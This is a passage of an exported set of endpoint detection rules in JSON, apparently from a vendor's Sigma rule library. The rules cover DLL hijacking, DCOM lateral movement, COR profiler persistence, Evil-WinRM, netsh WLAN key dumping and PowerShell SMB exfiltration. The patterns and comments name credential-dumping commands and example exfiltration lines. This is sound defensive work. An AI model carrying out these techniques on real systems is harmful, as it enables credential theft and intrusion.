"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "44948abc-3053-4899-af2a-e5a77e12bbba",
"rule_name": "DLL Hijacking via SandboxieBITS.exe",
"rule_description": "Detects potential Windows DLL Hijacking via SandboxieBITS.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-09-05",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "44b1b40e-cd1b-4a5a-a147-ed7b17206a94",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076726Z",
"creation_date": "2026-03-23T11:45:34.076728Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076732Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/",
"https://www.ired.team/offensive-security/lateral-movement/t1175-distributed-component-object-model",
"https://attack.mitre.org/techniques/T1021/003/"
],
"name": "t1021_003_lateral_movement_via_mmc20.yml",
"content": "title: Possible Lateral Movement via MMC20.Application\nid: 44b1b40e-cd1b-4a5a-a147-ed7b17206a94\ndescription: |\n Detects processes spawned by the MMC (Microsoft Management Console) that could be the result of a lateral movement obtained via DCOM (Distributed Component Object Model) using the MMC20 Application COM Object.\n Attackers can use this technique to execute remote commands on a target host, as part of lateral movement.\n It is recommended to investigate the spawned process to look for malicious actions and content.\nreferences:\n - https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/\n - https://www.ired.team/offensive-security/lateral-movement/t1175-distributed-component-object-model\n - https://attack.mitre.org/techniques/T1021/003/\ndate: 2023/05/16\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1021.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentCommandLine: '?:\\Windows\\system32\\mmc.exe -Embedding'\n GrandparentCommandLine: '?:\\Windows\\system32\\svchost.exe -k DcomLaunch'\n\n exclusion_werfault:\n Image: '?:\\Windows\\System32\\WerFault.exe'\n CommandLine|contains: '\\WerFault.exe -u -p '\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "44b1b40e-cd1b-4a5a-a147-ed7b17206a94",
"rule_name": "Possible Lateral Movement via MMC20.Application",
"rule_description": "Detects processes spawned by the MMC (Microsoft Management Console) that could be the result of a lateral movement obtained via DCOM (Distributed Component Object Model) using the MMC20 Application COM Object.\nAttackers can use this technique to execute remote commands on a target host, as part of lateral movement.\nIt is recommended to investigate the spawned process to look for malicious actions and content.\n",
"rule_creation_date": "2023-05-16",
"rule_modified_date": "2025-03-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1021.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "450c62c8-d09c-4677-9e8a-fbea161fe78b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076194Z",
"creation_date": "2026-03-23T11:45:34.076196Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076201Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/setting-up-a-profiling-environment",
"https://github.com/OmerYa/Invisi-Shell",
"https://0xdf.gitlab.io/2019/03/15/htb-ethereal-cor.html",
"https://attack.mitre.org/techniques/T1574/012/"
],
"name": "t1574_012_suspicious_cor_profiler.yml",
"content": "title: Suspicious COR Profiler CLSID Installed\nid: 450c62c8-d09c-4677-9e8a-fbea161fe78b\ndescription: |\n Detects the installation of a COR Profiler in the system registry.\n COR (Converged Open Runtimes) Profiler is a set of tools used for profiling .NET applications, allowing for the instrumentation and analysis of running .NET processes.\n It can also be misused by attackers to inject arbitrary code when a .NET program is launched, serving as a persistence mechanism.\n This rule targets a specific CLSID (Class identifier) known to be associated with malicious activities or tools using a COR Profiler (see references).\n It is recommended to investigate the source of the registry entries, analyze process behavior linked to the detected CLSID and monitor for unusual .NET execution patterns.\nreferences:\n - https://learn.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/setting-up-a-profiling-environment\n - https://github.com/OmerYa/Invisi-Shell\n - https://0xdf.gitlab.io/2019/03/15/htb-ethereal-cor.html\n - https://attack.mitre.org/techniques/T1574/012/\ndate: 2020/10/11\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1574.012\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKU\\\\*_Classes\\CLSID\\{cf0d821e-299b-5307-a3d8-b283c03916db}\\InprocServer32\\(Default)'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "450c62c8-d09c-4677-9e8a-fbea161fe78b",
"rule_name": "Suspicious COR Profiler CLSID Installed",
"rule_description": "Detects the installation of a COR Profiler in the system registry.\nCOR (Converged Open Runtimes) Profiler is a set of tools used for profiling .NET applications, allowing for the instrumentation and analysis of running .NET processes.\nIt can also be misused by attackers to inject arbitrary code when a .NET program is launched, serving as a persistence mechanism.\nThis rule targets a specific CLSID (Class identifier) known to be associated with malicious activities or tools using a COR Profiler (see references).\nIt is recommended to investigate the source of the registry entries, analyze process behavior linked to the detected CLSID and monitor for unusual .NET execution patterns.\n",
"rule_creation_date": "2020-10-11",
"rule_modified_date": "2025-02-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1574.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4522741d-31ae-4866-8abe-96b3f416fc86",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075865Z",
"creation_date": "2026-03-23T11:45:34.075867Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075881Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_takeown.yml",
"content": "title: DLL Hijacking via takeown.exe\nid: 4522741d-31ae-4866-8abe-96b3f416fc86\ndescription: |\n Detects potential Windows DLL Hijacking via takeown.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'takeown.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\SspiCli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4522741d-31ae-4866-8abe-96b3f416fc86",
"rule_name": "DLL Hijacking via takeown.exe",
"rule_description": "Detects potential Windows DLL Hijacking via takeown.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "45350ac4-ffd2-4ac5-b57d-819e6c36921a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077180Z",
"creation_date": "2026-03-23T11:45:34.077182Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077187Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Hackplayers/evil-winrm",
"https://attack.mitre.org/techniques/T1021/006/"
],
"name": "t1021_006_evil_winrm_powershell_execution.yml",
"content": "title: Evil-WinRM PowerShell Session Started\nid: 45350ac4-ffd2-4ac5-b57d-819e6c36921a\ndescription: |\n Detects a PowerShell activity by the Windows Remote Management (WinRM) process related to the execution of Evil-WinRM.\n Adversaries can use valid accounts and the Evil-WinRM tool to access endpoints via WinRM and perform lateral movement.\n It is recommended to investigate other PowerShell commands executed by the detected process and its children as well as any malicious actions they could have taken.\nreferences:\n - https://github.com/Hackplayers/evil-winrm\n - https://attack.mitre.org/techniques/T1021/006/\ndate: 2025/10/21\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1087\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.HackTool.evil-winrm\n - classification.Windows.HackTool.evil-winrm-py\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n ProcessImage:\n - '?:\\Windows\\System32\\wsmprovhost.exe'\n - '?:\\Windows\\SysWOW64\\wsmprovhost.exe'\n\n # https://github.com/Hackplayers/evil-winrm\n selection_evilwinrm:\n PowershellCommand|contains|all:\n - '(get-location).path'\n - 'if (!$?)'\n\n # https://github.com/adityatelange/evil-winrm-py\n selection_evilwinrmpy:\n PowershellCommand: '$pwd.Path'\n\n condition: selection and 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "45350ac4-ffd2-4ac5-b57d-819e6c36921a",
"rule_name": "Evil-WinRM PowerShell Session Started",
"rule_description": "Detects a PowerShell activity by the Windows Remote Management (WinRM) process related to the execution of Evil-WinRM.\nAdversaries can use valid accounts and the Evil-WinRM tool to access endpoints via WinRM and perform lateral movement.\nIt is recommended to investigate other PowerShell commands executed by the detected process and its children as well as any malicious actions they could have taken.\n",
"rule_creation_date": "2025-10-21",
"rule_modified_date": "2025-10-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1087"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4538136c-2f3b-423b-ab28-46ea322d43a4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618278Z",
"creation_date": "2026-03-23T11:45:34.618280Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618284Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.synacktiv.com/publications/windows-secrets-extraction-a-summary",
"https://attack.mitre.org/techniques/T1003/",
"https://attack.mitre.org/techniques/T1016/002/"
],
"name": "t1003_netsh_show_wlan_keys.yml",
"content": "title: Wireless Passwords Dumped via netsh\nid: 4538136c-2f3b-423b-ab28-46ea322d43a4\ndescription: |\n Detects the dumping of wireless interfaces passwords using the netsh utility.\n Wireless passwords can be dumped using the \"netsh wlan\" command.\n Threat actors can use this to harvest WLAN passwords to ease further compromission from a wireless network.\n Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software.\n It is recommended to examine the process tree associated with this process to understand the execution context and to determine the legitimacy of this action.\nreferences:\n - https://www.synacktiv.com/publications/windows-secrets-extraction-a-summary\n - https://attack.mitre.org/techniques/T1003/\n - https://attack.mitre.org/techniques/T1016/002/\ndate: 2020/09/30\nmodified: 2025/05/09\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1016\n - attack.t1016.002\n - attack.credential_access\n - attack.t1003\n - attack.t1078\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Netsh\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_binary:\n - Image|endswith: '\\netsh.exe'\n - OriginalFileName: 'netsh.exe'\n\n selection_keys:\n CommandLine|contains:\n - 'wlan*show*key=clear'\n - 'wlan*export*key=clear'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n # NinjaRMMAgent\n exclusion_ninjarmm:\n GrandparentImage: '?:\\Program Files (x86)\\\\*\\winpty-agent.exe'\n\n exclusion_cyberwatch:\n GrandparentImage: '?:\\Program Files\\CYBERWATCH SAS\\CyberwatchAgent\\cyberwatch-agent.exe'\n\n exclusion_eclipse:\n ParentImage: '?:\\Program Files\\Java\\jdk-*\\bin\\javaw.exe'\n GrandparentImage|endswith: '\\eclipse.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4538136c-2f3b-423b-ab28-46ea322d43a4",
"rule_name": "Wireless Passwords Dumped via netsh",
"rule_description": "Detects the dumping of wireless interfaces passwords using the netsh utility.\nWireless passwords can be dumped using the \"netsh wlan\" command.\nThreat actors can use this to harvest WLAN passwords to ease further compromission from a wireless network.\nAdversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software.\nIt is recommended to examine the process tree associated with this process to understand the execution context and to determine the legitimacy of this action.\n",
"rule_creation_date": "2020-09-30",
"rule_modified_date": "2025-05-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1016",
"attack.t1016.002",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "453ec392-74ba-49e5-9ed5-2fc7a3c52b71",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592738Z",
"creation_date": "2026-03-23T11:45:34.592741Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592749Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://www.bleepingcomputer.com/news/security/lockbit-ransomware-abuses-windows-defender-to-load-cobalt-strike/",
"https://twitter.com/Sh0ckFR/status/1554021948967079936",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_nissrv.yml",
"content": "title: DLL Hijacking via NisSrv.exe\nid: 453ec392-74ba-49e5-9ed5-2fc7a3c52b71\ndescription: |\n Detects potential Windows DLL Hijacking via NisSrv.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers can use the legitimate and signed NisSrv.exe to load a malicious DLL named mpclient.dll and planted in the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://www.bleepingcomputer.com/news/security/lockbit-ransomware-abuses-windows-defender-to-load-cobalt-strike/\n - https://twitter.com/Sh0ckFR/status/1554021948967079936\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/08/02\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'NisSrv.exe'\n ProcessSignature: 'Microsoft Windows Publisher'\n ImageLoaded|endswith: '\\mpclient.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Program Files\\Windows Defender\\'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Program Files\\Windows Defender\\'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "453ec392-74ba-49e5-9ed5-2fc7a3c52b71",
"rule_name": "DLL Hijacking via NisSrv.exe",
"rule_description": "Detects potential Windows DLL Hijacking via NisSrv.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers can use the legitimate and signed NisSrv.exe to load a malicious DLL named mpclient.dll and planted in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-08-02",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4541ab75-2acf-47ff-bcc2-c8ac479ee8c7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604936Z",
"creation_date": "2026-03-23T11:45:34.604940Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604947Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://ericazelic.medium.com/ldap-queries-for-offensive-and-defensive-operations-4b035b816814",
"https://blog.talosintelligence.com/emerging-interlock-ransomware/",
"https://attack.mitre.org/techniques/T1087/002/"
],
"name": "t1087_002_domain_account_discovered_powershell.yml",
"content": "title: Domain Account Discovered via PowerShell\nid: 4541ab75-2acf-47ff-bcc2-c8ac479ee8c7\ndescription: |\n Detects the use of PowerShell to enumerate Active Directory user accounts.\n This may be used for reconnaissance to identify privileged or service accounts.\n It is recommended to analyze the parent process as well as other commands executed in the same PowerShell session to look for malicious content or actions.\nreferences:\n - https://ericazelic.medium.com/ldap-queries-for-offensive-and-defensive-operations-4b035b816814\n - https://blog.talosintelligence.com/emerging-interlock-ransomware/\n - https://attack.mitre.org/techniques/T1087/002/\ndate: 2025/07/09\nmodified: 2025/08/06\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.002\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - '[adsisearcher]'\n - 'objectCategory=user'\n - '.PropertiesToLoad.Add('\n - '.findAll()'\n\n filter_script:\n PowershellScriptPath|contains: '?'\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4541ab75-2acf-47ff-bcc2-c8ac479ee8c7",
"rule_name": "Domain Account Discovered via PowerShell",
"rule_description": "Detects the use of PowerShell to enumerate Active Directory user accounts.\nThis may be used for reconnaissance to identify privileged or service accounts.\nIt is recommended to analyze the parent process as well as other commands executed in the same PowerShell session to look for malicious content or actions.\n",
"rule_creation_date": "2025-07-09",
"rule_modified_date": "2025-08-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1087.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "454ab28f-f8cd-420f-8c76-62220807a066",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073349Z",
"creation_date": "2026-03-23T11:45:34.073351Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073355Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://twitter.com/malmoeb/status/1571145275649191936",
"https://attack.mitre.org/techniques/T1048/003/"
],
"name": "t1048_003_powershell_exfiltration_over_smb.yml",
"content": "title: Data Possibly Exfiltrated via PowerShell over SMB\nid: 454ab28f-f8cd-420f-8c76-62220807a066\ndescription: |\n Detects suspicious file copies using PowerShell over SMB.\n Attackers can use this technique as SMB traffic is often allowed on networks and PowerShell usage allows a Living-of-the-Land approach.\n It is recommended to investigate the PowerShell script, the copied files as well as the PowerShell process ancestors to determine the legitimacy of this action.\nreferences:\n - https://twitter.com/malmoeb/status/1571145275649191936\n - https://attack.mitre.org/techniques/T1048/003/\ndate: 2022/09/27\nmodified: 2025/11/04\nauthor: HarfangLab\ntags:\n - attack.exfiltration\n - attack.t1048.003\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.NetworkActivity\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n # Copy-Item -Path \"C:\\Exfiltration\" -Destination \"\\\\10.2.124.12\\admin$\" -Recurse\n # Copy-Item -Path \"\\\\10.2.124.12\\C$\\Windows\\temp\\a.exe\" -Destination \"$Env:TEMP\\a.exe\"\n PowershellCommand|re:\n - '(?i)Copy-Item -P[ath]{0,3} [[:print:]]+ -D[estination]{0,10} [[:print:]]{0,1}\\\\\\\\([0-9]{1,3}\\.){3}([0-9]{1,3})\\\\(c\\$|admin\\$)'\n - '(?i)Copy-Item -P[ath]{0,3} [[:print:]]{0,1}\\\\\\\\([0-9]{1,3}\\.){3}([0-9]{1,3})\\\\(c\\$|admin\\$)[[:print:]]+ -D[estination]{0,10} '\n\n condition: selection\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
